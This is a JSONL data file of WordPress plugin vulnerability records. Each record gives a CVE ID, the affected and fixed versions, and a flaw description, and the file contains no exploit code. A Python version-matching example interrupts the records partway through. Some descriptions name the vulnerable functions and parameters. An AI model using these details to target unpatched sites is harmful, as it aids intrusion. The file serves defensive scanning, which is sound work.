version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca41c951-318f-47a7-9a30-c1d4eea1b1b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca41c951-318f-47a7-9a30-c1d4eea1b1b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11359","slug":"library-bookshelves","versionImpact":"5.8","versionEndExcluding":"5.9","description":"The Library Bookshelves plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/tags\\\/5.8\\\/class-bookshelves-settings.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/tags\\\/5.8\\\/class-bookshelves-settings.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204540%40library-bookshelves&new=3204540%40library-bookshelves&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204540%40library-bookshelves&new=3204540%40library-bookshelves&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/253dcecb-b88d-423c-8e74-1d59581e2893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/253dcecb-b88d-423c-8e74-1d59581e2893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5720","slug":"customer-reviews-woocommerce","versionImpact":"5.80.2","versionEndExcluding":"5.81.0","description":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018author\u2019 parameter in all versions up to, and including, 5.80.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.81.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1033\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1033\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1052\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1052\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1073\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customer-reviews-woocommerce\\\/tags\\\/5.78.1\\\/includes\\\/reviews\\\/class-cr-reviews-list-table.php#L1073\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6126ec74-d522-45ff-aa03-07aad5fb75b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6126ec74-d522-45ff-aa03-07aad5fb75b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8113","slug":"ebook-store","versionImpact":"5.8014","versionEndExcluding":"5.8015","description":"The Ebook Store WordPress plugin before 5.8015 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers.","recommendation":"Update to version 5.8015, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/752908b4-7d05-476f-8920-1d0e58fc2983\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/752908b4-7d05-476f-8920-1d0e58fc2983\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7486","slug":"ebook-store","versionImpact":"5.8012","versionEndExcluding":"5.8013","description":"The Ebook Store plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Order Details in all versions up to, and including, 5.8012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.8013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e0e651-8330-4062-8fb4-f0545befcb1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e0e651-8330-4062-8fb4-f0545befcb1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7437","slug":"ebook-store","versionImpact":"5.8012","versionEndExcluding":"5.8013","description":"The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebook_store_save_form function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.8013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L2442\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L2442\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc5c05d-51b7-4aee-bb4e-366ded45c4d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dc5c05d-51b7-4aee-bb4e-366ded45c4d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11287","slug":"ebook-store","versionImpact":"5.8001","versionEndExcluding":"5.8002","description":"The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.8002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L827\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-store\\\/trunk\\\/functions.php#L827\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001289a3-a1a9-441f-b399-e9b699094e1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/001289a3-a1a9-441f-b399-e9b699094e1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
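The records in this file carry only an inclusive upper bound ("versionImpact") and a first fixed version ("versionEndExcluding"), and their "refs" field is a JSON array that has been JSON-encoded a second time as a string. The Python below is an added example, not Security Ninja's own scanner code and not taken from the page: it shows how a consumer of plugins_vulns.jsonl decides whether an installed plugin is affected, using a version comparison that handles the shapes actually present in these records (5.9 against 5.9.0, 5.80.2 against 5.81.0, 5.8014 against 5.8015, and 5.10 against 5.9, which a plain string comparison would misorder). The field semantics, the pre-release handling and the three sample records are assumptions of this example, not something the file itself documents.

```python
"""Match installed WordPress plugin versions against plugins_vulns.jsonl records.

Added example, not Security Ninja's code.  Assumptions (the file documents none
of its fields): "versionImpact" is the highest affected version,
"versionEndExcluding" is the first fixed version (installed < fixed => affected),
"refs" is a JSON array encoded a second time as a JSON string, and version
strings are dotted integers with an optional pre-release tag such as -rc1.
"""
import json
import re

# Constructed sample records in the file's own layout: descriptions shortened,
# refs reduced to one entry so the double JSON encoding is still visible.
SAMPLE_JSONL = r"""
{"CVE_ID":"CVE-2024-11287","slug":"ebook-store","versionImpact":"5.8001","versionEndExcluding":"5.8002","description":"(constructed) reflected XSS via add_query_arg","recommendation":"Update to version 5.8002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/example.invalid\\\/a\",\"name\":\"a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11359","slug":"library-bookshelves","versionImpact":"5.8","versionEndExcluding":"5.9","description":"(constructed) reflected XSS via add_query_arg","recommendation":"Update to version 5.9, or a newer patched version","refs":"[]"}
{"CVE_ID":"CVE-2024-2242","slug":"contact-form-7","versionImpact":"5.9","versionEndExcluding":"5.9.2","description":"(constructed) reflected XSS via active-tab","recommendation":"Update to version 5.9.2, or a newer patched version","refs":"[]"}
"""

# Pre-release tags rank below the final release, patch-level ("pl") above it;
# an unrecognised tag ranks lowest.  A final release is rank 4.
_TAG_RANK = {"dev": 0, "alpha": 1, "a": 1, "beta": 2, "b": 2, "rc": 3, "c": 3, "pl": 5, "p": 5}
_RELEASE_RANK = 4


def parse_version(text):
    """Split '5.9.2-rc1' into ((5, 9, 2), (3, 1)); a final release yields (4, 0)."""
    m = re.fullmatch(r"\s*v?(\d+(?:\.\d+)*)(?:[-._]?([A-Za-z]+)\.?(\d*))?\s*", text)
    if not m:
        raise ValueError(f"unparseable version string: {text!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    tag = m.group(2)
    if tag is None:
        return numbers, (_RELEASE_RANK, 0)
    return numbers, (_TAG_RANK.get(tag.lower(), -1), int(m.group(3) or 0))


def compare_versions(a, b):
    """Return -1, 0 or 1.  Missing components count as zero, so '5.9' == '5.9.0';
    this deliberately differs from PHP's version_compare(), which ranks '5.9'
    below '5.9.0', because this file mixes both spellings for the same meaning."""
    a_nums, a_pre = parse_version(a)
    b_nums, b_pre = parse_version(b)
    width = max(len(a_nums), len(b_nums))
    a_nums += (0,) * (width - len(a_nums))
    b_nums += (0,) * (width - len(b_nums))
    return (a_nums > b_nums) - (a_nums < b_nums) or (a_pre > b_pre) - (a_pre < b_pre)


def load_records(jsonl_text):
    """Parse one record per line and decode the doubly encoded 'refs' field."""
    records = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        refs = rec.get("refs", "[]")
        rec["refs"] = json.loads(refs) if isinstance(refs, str) else refs
        records.append(rec)
    return records


def is_affected(installed, rec):
    """Affected when installed < first fixed version; with no fixed version
    known, fall back to the inclusive upper bound in versionImpact."""
    fixed = rec.get("versionEndExcluding")
    if fixed:
        return compare_versions(installed, fixed) < 0
    return compare_versions(installed, rec["versionImpact"]) <= 0


def find_vulns(installed_plugins, records):
    """installed_plugins maps plugin slug -> version string.
    Returns sorted (slug, installed, CVE_ID, fixed_in) tuples for each hit."""
    hits = []
    for rec in records:
        version = installed_plugins.get(rec["slug"])
        if version is not None and is_affected(version, rec):
            hits.append((rec["slug"], version, rec["CVE_ID"], rec.get("versionEndExcluding")))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed inventory; on a real site it would come from `wp plugin list --format=json`.
    installed = {"ebook-store": "5.8001", "library-bookshelves": "5.9", "contact-form-7": "5.9.1"}
    for slug, version, cve, fixed in find_vulns(installed, load_records(SAMPLE_JSONL)):
        print(f"{slug} {version}: {cve}, fixed in {fixed}")
```

Note that the slug is the only join key between this file and an installed plugin, so a plugin installed under a renamed directory will not match; and because "library-bookshelves" 5.9 equals its own "versionEndExcluding", it is correctly reported as not affected while "contact-form-7" 5.9.1 (below 5.9.2) is.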
{"CVE_ID":"CVE-2024-5453","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.6","versionEndExcluding":"5.8.7","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_dismissible_notice and pm_wizard_update_group_icon functions in all versions up to, and including, 5.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options to the value '1' or change group icons.","recommendation":"Update to version 5.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a44d182-2a43-47c0-ab2e-36c0514c1d47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a44d182-2a43-47c0-ab2e-36c0514c1d47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L2006\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095503\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095503\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6449","slug":"contact-form-7","versionImpact":"5.8.3","versionEndExcluding":"5.8.4","description":"The Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'validate' function and insufficient blocklisting on the 'wpcf7_antiscript_file_name' function in versions up to, and including, 5.8.3. This makes it possible for authenticated attackers with editor-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed in most cases. By default, the file will be deleted from the server immediately. However, in some cases, other plugins may make it possible for the file to live on the server longer. This can make remote code execution possible when combined with another vulnerability, such as local file inclusion.","recommendation":"Update to version 5.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7fb020-6acb-445e-a46b-bdb5aaf8f2b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7fb020-6acb-445e-a46b-bdb5aaf8f2b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/5.8.3\\\/includes\\\/formatting.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7\\\/tags\\\/5.8.3\\\/includes\\\/formatting.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/rocklobster-in\\\/contact-form-7\\\/compare\\\/v5.8.3...v5.8.4\",\"name\":\"https:\\\/\\\/github.com\\\/rocklobster-in\\\/contact-form-7\\\/compare\\\/v5.8.3...v5.8.4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/contactform7.com\\\/2023\\\/11\\\/30\\\/contact-form-7-584\\\/\",\"name\":\"https:\\\/\\\/contactform7.com\\\/2023\\\/11\\\/30\\\/contact-form-7-584\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003556\\\/contact-form-7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003556\\\/contact-form-7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3606","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.3","versionEndExcluding":"5.8.4","description":"The ProfileGrid \u2013 User Profiles, Memberships, Groups and Communities plugin for WordPress is vulnerable to unauthorized deletion of data due to a missing capability check on the pm_upload_cover_image function in all versions up to, and including, 5.8.3. This makes it possible for authenticated attackers, with subscriber access or higher, to delete attachments.","recommendation":"Update to version 5.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c039d2fe-7518-4724-a025-6380a53fb58c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c039d2fe-7518-4724-a025-6380a53fb58c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069928\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk?contextall=1&old=3068943&old_path=%2Fprofilegrid-user-profiles-groups-and-communities%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069928\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk?contextall=1&old=3068943&old_path=%2Fprofilegrid-user-profiles-groups-and-communities%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5140","slug":"bonus-for-woo","versionImpact":"5.8.2","versionEndExcluding":"5.8.3","description":"The Bonus for Woo WordPress plugin before 5.8.3 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 5.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee1824e8-09a6-4763-b65e-03701dc3e171\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee1824e8-09a6-4763-b65e-03701dc3e171\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5612","slug":"essential-addons-elementor","versionImpact":"5.8.15","versionEndExcluding":"5.8.16","description":"The Essential Addons for Elementor Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_lightbox_open_btn_icon\u2019 parameter within the Lightbox & Modal widget in all versions up to, and including, 5.8.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dbe4104-b7d1-484f-a843-a3d1fc02999d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8dbe4104-b7d1-484f-a843-a3d1fc02999d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5086","slug":"essential-addons-elementor","versionImpact":"5.8.14","versionEndExcluding":"5.8.15","description":"The Essential Addons for Elementor PRO \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Team Member Carousel widget in all Pro versions up to, and including, 5.8.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7773b98-537f-4f4e-98d6-db61d2bffe8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7773b98-537f-4f4e-98d6-db61d2bffe8c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7850","slug":"bp-profile-search","versionImpact":"5.7.5","versionEndExcluding":"5.8","description":"The BP Profile Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.7.5. This is due to missing or incorrect nonce validation on the bps_ajax_field_selector(), bps_ajax_template_options(), and bps_ajax_field_row() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1acfa5d1-c1ba-4ba5-9511-0f4adbe5b9ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1acfa5d1-c1ba-4ba5-9511-0f4adbe5b9ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-search\\\/trunk\\\/bps-admin.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-search\\\/trunk\\\/bps-admin.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136686\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136686\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137271\\\/bp-profile-search\\\/tags\\\/5.8\\\/bps-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3137271\\\/bp-profile-search\\\/tags\\\/5.8\\\/bps-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12712","slug":"wp-easycart","versionImpact":"5.7.8","versionEndExcluding":"5.7.9","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the webhook function in all versions up to, and including, 5.7.8. This makes it possible for unauthenticated attackers to modify order statuses.","recommendation":"Update to version 5.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211285\\\/wp-easycart\\\/trunk\\\/wpeasycart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211285\\\/wp-easycart\\\/trunk\\\/wpeasycart.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a3f382-3801-4e98-9004-56c27a85f0a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a3f382-3801-4e98-9004-56c27a85f0a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11924","slug":"email-subscribers","versionImpact":"5.7.51","versionEndExcluding":"5.7.52","description":"The Icegram Express formerly known as Email Subscribers  WordPress plugin before 5.7.52 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70288369-132d-4211-bca0-0411736df747\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70288369-132d-4211-bca0-0411736df747\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0671","slug":"email-subscribers","versionImpact":"5.7.49","versionEndExcluding":"5.7.50","description":"The Icegram Express  WordPress plugin before 5.7.50 does not sanitise and escape some of its Template settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e04f01-31cb-4f5e-9739-12f803600e60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e04f01-31cb-4f5e-9739-12f803600e60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12568","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its Workflow settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ce9075a-754b-474e-9620-17da8ee29b56\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ce9075a-754b-474e-9620-17da8ee29b56\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12567","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82051ccc-c528-4ff3-900a-3b8e8ad34145\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82051ccc-c528-4ff3-900a-3b8e8ad34145\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12566","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9206064a-d54e-44ad-9670-65520ee166a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9206064a-d54e-44ad-9670-65520ee166a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11636","slug":"email-subscribers","versionImpact":"5.7.44","versionEndExcluding":"5.7.45","description":"The Email Subscribers by Icegram Express  WordPress plugin before 5.7.45 does not sanitise and escape some of its Text Block options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.7.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da616c20-3d74-4d3a-95f5-2d71d9ada094\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da616c20-3d74-4d3a-95f5-2d71d9ada094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
